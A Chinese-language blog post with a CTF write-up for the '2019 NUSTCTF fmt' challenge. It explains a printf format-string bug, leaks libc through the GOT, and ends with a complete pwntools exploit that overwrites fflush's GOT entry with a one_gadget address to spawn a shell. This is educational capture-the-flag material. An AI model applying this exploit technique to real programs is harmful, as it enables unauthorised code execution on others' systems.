<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.9.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>2019 NUSTCTF fmt - Mask&#39;s blogs</title>


    <meta name="description" content="本次校赛的题目，作为一个PWN手居然没有做出来 而且一直纠结于这个题目，导致错过了求解其他题目的机会，有点小后悔 关键还是在于对这个漏洞利用的不熟练，导致很多时间用来学习和踩坑了，事实证明，我还是太菜啦">
<meta name="keywords" content="pwn,stack,libc,fmt">
<meta property="og:type" content="article">
<meta property="og:title" content="2019 NUSTCTF fmt">
<meta property="og:url" content="http://mask6asok.top/2019/04/27/2019NUSTCTF-fmt.html">
<meta property="og:site_name" content="Mask&#39;s blogs">
<meta property="og:description" content="本次校赛的题目，作为一个PWN手居然没有做出来 而且一直纠结于这个题目，导致错过了求解其他题目的机会，有点小后悔 关键还是在于对这个漏洞利用的不熟练，导致很多时间用来学习和踩坑了，事实证明，我还是太菜啦">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://mask6asok.top/images/og_image.png">
<meta property="og:updated_time" content="2020-01-20T06:49:18.016Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2019 NUSTCTF fmt">
<meta name="twitter:description" content="本次校赛的题目，作为一个PWN手居然没有做出来 而且一直纠结于这个题目，导致错过了求解其他题目的机会，有点小后悔 关键还是在于对这个漏洞利用的不熟练，导致很多时间用来学习和踩坑了，事实证明，我还是太菜啦">
<meta name="twitter:image" content="http://mask6asok.top/images/og_image.png">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
<style>body>.footer,body>.navbar,body>.section{opacity:0}</style>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">

    
    
    
    
<link rel="stylesheet" href="/css/back-to-top.css">

    
    
    
    
    
    
    
    <link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
    
    
    


<link rel="stylesheet" href="/css/style.css">
</head>
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.ico" alt="2019 NUSTCTF fmt" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">Home</a>
                
                <a class="navbar-item"
                href="/archives">Archives</a>
                
                <a class="navbar-item"
                href="/categories">Categories</a>
                
                <a class="navbar-item"
                href="/tags">Tags</a>
                
                <a class="navbar-item"
                href="/about">About</a>
                
            </div>
            
            <div class="navbar-end">
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main">  

<div class="card">
    
    <div class="card-content article ">
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                <i class="fas fa-angle-double-right"></i>2019 NUSTCTF fmt
            
        </h1>
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2019-04-26T16:05:38.000Z"><i class="far fa-calendar-alt">&nbsp;</i>2019-04-27</time>
                
                <time class="level-item has-text-grey is-hidden-mobile" datetime="2020-01-20T06:49:18.016Z"><i class="far fa-calendar-check">&nbsp;</i>2020-01-20</time>
                
                
                <div class="level-item">
                <i class="far fa-folder-open has-text-grey"></i>&nbsp;
                <a class="has-link-grey -link" href="/categories/Pwn/">Pwn</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    <i class="far fa-clock"></i>&nbsp;
                    
                    
                    11 分钟 读完 (大约 1668 个字)
                </span>
                
                
            </div>
        </div>
        
        <div class="content">
            <p>本次校赛的题目，作为一个PWN手居然没有做出来</p>
<p>而且一直纠结于这个题目，导致错过了求解其他题目的机会，有点小后悔</p>
<p>关键还是在于对这个漏洞利用的不熟练，导致很多时间用来学习和踩坑了，事实证明，<strong>我还是太菜啦</strong></p>
<a id="more"></a>
<p>好了，先查看一下程序的基本思路</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __cdecl __<span class="function">noreturn <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [rsp+0h] [rbp-400h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">memset</span>(&amp;s, <span class="number">0</span>, <span class="number">0x400</span>uLL);</span><br><span class="line">    read(<span class="number">0</span>, &amp;s, <span class="number">0x400</span>uLL);</span><br><span class="line">    <span class="built_in">printf</span>(&amp;s, &amp;s);</span><br><span class="line">    fflush(_bss_start);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以发现，就是一个<code>格式化字符串</code>漏洞，当时我就很高兴啊，这么简单的题目。可是等我开始利用的时候，才发现是多么难利用！</p>
<p>关键点在于：</p>
<blockquote>
<p>1.buf有0x400这么长<br>2.每次也是读取0x400个字节(也就是说，单纯的输入不能超出缓存区)<br>3.同时，由于程序设置是一个无限循环，也就是说没有retn的eip可以劫持(这一点可以在汇编代码中发现，没有retn的指令)<br>4.每次循环结束，都会利用fflush来把buf清零，所以不能使用上一次输入的内容，每次输入一次有效<br>5.查看程序保护机制</p>
<blockquote>
<p>➜  fmt checksec fmt<br>[*] ‘/home/pwn/Desktop/pwn/NUSTCTF/fmt/fmt’<br>    Arch:     amd64-64-little<br>    RELRO:    Partial RELRO<br>    Stack:    No canary found<br>    NX:       NX disabled<br>    PIE:      No PIE (0x400000)<br>    RWX:      Has RWX segments </p>
</blockquote>
<p>  没有canary，没有PIE，NX也是关闭的<br>  NX关闭意味着输入shellcode并且控制rip到shellcode地址处<br>可是由于程序是死循环状态，以往的冲刷<code>saved-rip</code>的方法就不能用了也就需要另辟蹊径</p>
</blockquote>
<p>在程序代码中，我们可以发现，在执行完<code>printf</code>利用漏洞完后，会执行<code>fflush</code>这个函数</p>
<p><code>fflush</code>函数也是库函数，也有PLT表GOT表以及在栈中的LIBC偏移地址，所以我们可以利用这个函数来实现控制程序执行流</p>
<p>本题有两种解法：</p>
<blockquote>
<p>1.shellcode<br>2.one gadget</p>
</blockquote>
<p>我这里先利用 one gadget 的方法，至于 shellcode 的利用，以后有时间再更新（咕咕咕）</p>
<h2 id="one-gadget"><a href="#one-gadget" class="headerlink" title="one gadget"></a>one gadget</h2><p>one gadget是libc中一段可以起shell的代码，具体libc有不同的偏移地址，而且就算是同一个libc，不同利用时，有些地址的可以，有些地址的就不行，我也不知道为啥，逐个试吧哈哈</p>
<blockquote>
<p>我本地机子的可用 one gadget 偏移地址是 0xF02A4<br>fflush函数在libc中的偏移是 0x6D7A0</p>
</blockquote>
<p>首先我们要确定libc加载的基址，可以利用格式化字符串漏洞中的任意读功能</p>
<blockquote>
<p>$s 可以读取一个地址中的数据<br>加以 %n$s 可以控制以参数中第n+1个值为地址<br>64位linux系统前6个参数为 rsi rdi rdx rcx r8 r9 往后的参数就放在栈上 %6$s 就可以读取以栈顶数据为地址中的内容<br>got表中存放着库函数在栈中的地址</p>
</blockquote>
<p>所以我们利用这个任意读功能和got表就可以泄露libc的基址</p>
<blockquote>
<p>%7$s + aaaa + func_got</p>
</blockquote>
<p>这里利用<code>fflush</code>函数来泄露libc</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">get_libc_payload = <span class="string">"%7$s"</span>.ljust(<span class="number">8</span>, <span class="string">'a'</span>)+p64(e.got[<span class="string">'read'</span>])</span><br><span class="line">p.send(get_libc_payload)</span><br><span class="line">read_libc = u64(p.recv(<span class="number">6</span>)+<span class="string">'\x00\x00'</span>)</span><br><span class="line"><span class="keyword">print</span> hex(read_libc)</span><br><span class="line">begin_libc = read_libc<span class="number">-0xF1147</span></span><br><span class="line"><span class="keyword">print</span> hex(begin_libc)</span><br></pre></td></tr></table></figure>
<p>接着再计算 one gadget 地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">one_gadget_libc = begin_libc+<span class="number">0xF02A4</span></span><br><span class="line"><span class="keyword">print</span> hex(one_gadget_libc)</span><br></pre></td></tr></table></figure>
<p>于是乎大部分工作就准备好了，<del>问题就来了</del></p>
<p>以我某次调试的数据为例：</p>
<blockquote>
<p>0x7fab278897a0  &lt; 这个是fflush的地址<br>0x7fab2781c000<br>0x7fab2790c2a4   &lt; 这个是one gadget地址</p>
</blockquote>
<p>我们可以看到，这个地址的低3位是不一样的，也就是说我们需要修改这3位的数据</p>
<p>printf中可以往指定地址修改数据，有以下形式：</p>
<blockquote>
<p>$n 修改一个字，在64位系统中，就是4个byte<br>$hn 修改半个字，在64位系统中，就是2个byte<br>$hhn 修改一个字节，在64位系统中，就是1个byte<br>其中修改的数值为当前已输出的字符数<br>可以利用 %nc 来输出n个字符</p>
</blockquote>
<p>一般情况下，如果利用 $n 来修改，会因为字符数输出太多而报错，所以可以利用 $hhn 来实现单字节单字节修改</p>
<p>而由于这个程序会在每次执行完这个漏洞后调用一次<code>fflush</code>，所以这就要求我们才一次漏洞利用机会中修改三个字节</p>
<p>当时我就卡在这里啊，真可恶！</p>
<p>我们可以在一个格式化字符串中构造如下：</p>
<blockquote>
<p>%c %a$hhn %c %b$hhn %c %c$hhns</p>
</blockquote>
<p>并在abc相应的偏移上放上地址，就可以实现一次性修改三个地址中一个byte的数据</p>
<p>需要注意的是，排在后面的 $hhn 实际写入的值会是前几次 %c 的总和</p>
<p>所以我们要精心构造这个顺序，以使得能写入正确的值</p>
<p>我们可以这样写：</p>
<blockquote>
<p>假设低3位是 abc 这样排序<br>那么如果我们先把最小的那一个（假如是b）先写入对应地址中 %bc，地址是 (target+1)<br>接着写第二小的那一个（假如是a），到对应地址中 %(a-b)c，地址是(target+2)<br>最后写入最大的那一个（是c啦）到对应地址 %(c-a-b)c，地址是(target)</p>
</blockquote>
<p>这样就能正确写入 one gadget 的地址，然后执行<code>fflush</code>时就可以跳到对应地址去执行shell了</p>
<h3 id="完整EXP"><a href="#完整EXP" class="headerlink" title="完整EXP:"></a>完整EXP:</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./fmt'</span>)</span><br><span class="line">e = ELF(<span class="string">'./fmt'</span>)</span><br><span class="line">p.send(<span class="string">'hello'</span>)</span><br><span class="line">p.recv()</span><br><span class="line">get_libc_payload = <span class="string">"%7$s"</span>.ljust(<span class="number">8</span>, <span class="string">'a'</span>)+p64(e.got[<span class="string">'fflush'</span>])</span><br><span class="line">p.send(get_libc_payload)</span><br><span class="line">fflush_libc = u64(p.recv(<span class="number">6</span>)+<span class="string">'\x00\x00'</span>)</span><br><span class="line"><span class="keyword">print</span> hex(fflush_libc)</span><br><span class="line">begin_libc = fflush_libc<span class="number">-0x6D7A0</span></span><br><span class="line"><span class="keyword">print</span> hex(begin_libc)</span><br><span class="line">one_gadget_libc = begin_libc+<span class="number">0xF02A4</span></span><br><span class="line"><span class="keyword">print</span> hex(one_gadget_libc)</span><br><span class="line">a1 = (one_gadget_libc &amp; <span class="number">0xff0000</span>) &gt;&gt; <span class="number">16</span></span><br><span class="line">a2 = (one_gadget_libc &amp; <span class="number">0xff00</span>) &gt;&gt; <span class="number">8</span></span><br><span class="line">a3 = one_gadget_libc &amp; <span class="number">0xff</span></span><br><span class="line"><span class="keyword">print</span> hex(a1)+hex(a2)+hex(a3)</span><br><span class="line">point1 = [<span class="number">2</span>, a1]</span><br><span class="line">point2 = [<span class="number">1</span>, a2]</span><br><span class="line">point3 = [<span class="number">0</span>, a3]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">swap</span><span class="params">(p1, p2)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">2</span>):</span><br><span class="line">        t = p1[i]</span><br><span class="line">        p1[i] = p2[i]</span><br><span class="line">        p2[i] = t</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> a1 &gt; a2:</span><br><span class="line">    swap(point1, point2)</span><br><span class="line"><span class="keyword">if</span> a1 &gt; a3:</span><br><span class="line">    swap(point1, point3)</span><br><span class="line"><span class="keyword">if</span> a2 &gt; a3:</span><br><span class="line">    swap(point2, point3)</span><br><span class="line"><span class="keyword">print</span> point1+point2+point3</span><br><span class="line"></span><br><span class="line">point2[<span class="number">1</span>] = point2[<span class="number">1</span>]-point1[<span class="number">1</span>]</span><br><span class="line">point3[<span class="number">1</span>] = point3[<span class="number">1</span>]-point2[<span class="number">1</span>]-point1[<span class="number">1</span>]</span><br><span class="line"><span class="keyword">print</span> point1+point2+point3</span><br><span class="line"></span><br><span class="line">write_got_payload = <span class="string">'%'</span>+str(point1[<span class="number">1</span>])+<span class="string">'c'</span>+<span class="string">'%12$hhn'</span></span><br><span class="line">write_got_payload += <span class="string">'%'</span>+str(point2[<span class="number">1</span>])+<span class="string">'c'</span>+<span class="string">'%13$hhn'</span></span><br><span class="line">write_got_payload += <span class="string">'%'</span>+str(point3[<span class="number">1</span>])+<span class="string">'c'</span>+<span class="string">'%14$hhn'</span></span><br><span class="line">write_got_payload = write_got_payload.ljust(<span class="number">48</span>, <span class="string">'a'</span>)</span><br><span class="line">write_got_payload += p64(e.got[<span class="string">'fflush'</span>]+point1[<span class="number">0</span>])</span><br><span class="line">write_got_payload += p64(e.got[<span class="string">'fflush'</span>]+point2[<span class="number">0</span>])</span><br><span class="line">write_got_payload += p64(e.got[<span class="string">'fflush'</span>]+point3[<span class="number">0</span>])</span><br><span class="line"></span><br><span class="line">p.send(write_got_payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
        </div>
        
            <ul class="post-copyright">
            <li><strong>本文标题：</strong><a href="http://mask6asok.top/2019/04/27/2019NUSTCTF-fmt.html">2019 NUSTCTF fmt</a></li>
            <li><strong>本文作者：</strong><a href="http://mask6asok.top">Mask</a></li>
            <li><strong>本文链接：</strong><a href="http://mask6asok.top/2019/04/27/2019NUSTCTF-fmt.html">http://mask6asok.top/2019/04/27/2019NUSTCTF-fmt.html</a></li>
            <li><strong>发布时间：</strong>2019-04-27</li>
            <li><strong>版权声明：</strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！
            </li>
            </ul>
        
        
        <hr style="height:1px;margin:1rem 0"/>
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <i class="fas fa-tags has-text-grey"></i>&nbsp;
                    <a class="has-link-grey -link" href="/tags/fmt/">fmt</a>,&nbsp;<a class="has-link-grey -link" href="/tags/libc/">libc</a>,&nbsp;<a class="has-link-grey -link" href="/tags/pwn/">pwn</a>,&nbsp;<a class="has-link-grey -link" href="/tags/stack/">stack</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>





<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2019/07/20/2019 SUSCTF PWN.html">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">2019 SUSCTF PWN</span>
            </a>
        </div>
        
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<div id="valine-thread" class="content"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#valine-thread' ,
        notify: true,
        verify: false,
        app_id: 'dJYo5Hd2YM7egj3xxjH11dIe-gzGzoHsz',
        app_key: 'mUXnVjoH20Fj43HYJ4g7Kvz0',
        placeholder: 'Write somethings...'
    });
</script>

    </div>
</div>
</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        


    <div class="card widget" id="toc">
        <div class="card-content">
            <div class="menu">
                <h3 class="menu-label">
                    目录
                </h3>
                <ul class="menu-list"><li>
        <a class="is-flex" href="#one-gadget">
        <span class="has-mr-6">1</span>
        <span>one gadget</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#完整EXP">
        <span class="has-mr-6">1.1</span>
        <span>完整EXP:</span>
        </a></li></ul></li></ul>
            </div>
        </div>
    </div>

    
        
<div class="card widget">
    <div class="card-content">
        <nav class="level">
            <div class="level-item has-text-centered" style="flex-shrink: 1">
                <div>
                    
                    <figure class="image is-128x128 has-mb-6">
                        <img class="" src="/images/avatar.png" alt="Mask">
                    </figure>
                    
                    <p class="is-size-4 is-block">
                        Mask
                    </p>
                    
                    
                    <p class="is-size-6 is-block">
                        A newbie in CTF
                    </p>
                    
                    
                </div>
            </div>
        </nav>
        <nav class="level is-mobile">
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        文章
                    </p>
                    <a href="/archives">
                        <p class="title has-text-weight-normal">
                            25
                        </p>
                    </a>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        分类
                    </p>
                    <a href="/categories">
                        <p class="title has-text-weight-normal">
                            5
                        </p>
                    </a>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        标签
                    </p>
                    <a href="/tags">
                        <p class="title has-text-weight-normal">
                            15
                        </p>
                    </a>
                </div>
            </div>
        </nav>
        
        
        
        <div class="level is-mobile">
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="Github" href="https://github.com/mask6asok">
                
                <i class="fab fa-github"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="QQ" href="tencent://message/?uin=1924594189&amp;Site=&amp;menu=yes">
                
                <i class="fab fa-qq"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="Email" href="mailto:1924594189@qq.com">
                
                <i class="fa fa-envelope"></i>
                
            </a>
            
        </div>
        
    </div>
</div>
    
        <div class="card widget">
    <div class="card-content">
        <div class="menu">
        <h3 class="menu-label">
            链接
        </h3>
        <ul class="menu-list">
        
            <li>
                <a class="level is-mobile" href="https://binlep.github.io/" target="_blank" rel="noopener">
                    <span class="level-left">
                        <span class="level-item">binLep&#39;s blog</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">binlep.github.io</span>
                    </span>
                </a>
            </li>
        
            <li>
                <a class="level is-mobile" href="http://120.79.211.91/writeup-and-technology-sharing" target="_blank" rel="noopener">
                    <span class="level-left">
                        <span class="level-item">C0ss4ck&#39;s blog</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">120.79.211.91</span>
                    </span>
                </a>
            </li>
        
        </ul>
        </div>
    </div>
</div>

    
    
        <div class="column-right-shadow is-hidden-widescreen is-sticky">
        
        </div>
    
</div>

                
            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.ico" alt="2019 NUSTCTF fmt" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2020 Mask&nbsp;
                Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a>
                
                </p>
            </div>
            <div class="level-end">
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>


<script>
var IcarusThemeSettings = {
    site: {
        url: 'http://mask6asok.top',
        external_link: {"enable":true,"exclude":[]}
    },
    article: {
        highlight: {
            clipboard: false,
            fold: ''
        }
    }
};
</script>






<script src="/js/animation.js"></script>



<script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
<script src="/js/gallery.js" defer></script>



<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>


<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>














<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML"></script>
</body>
</html>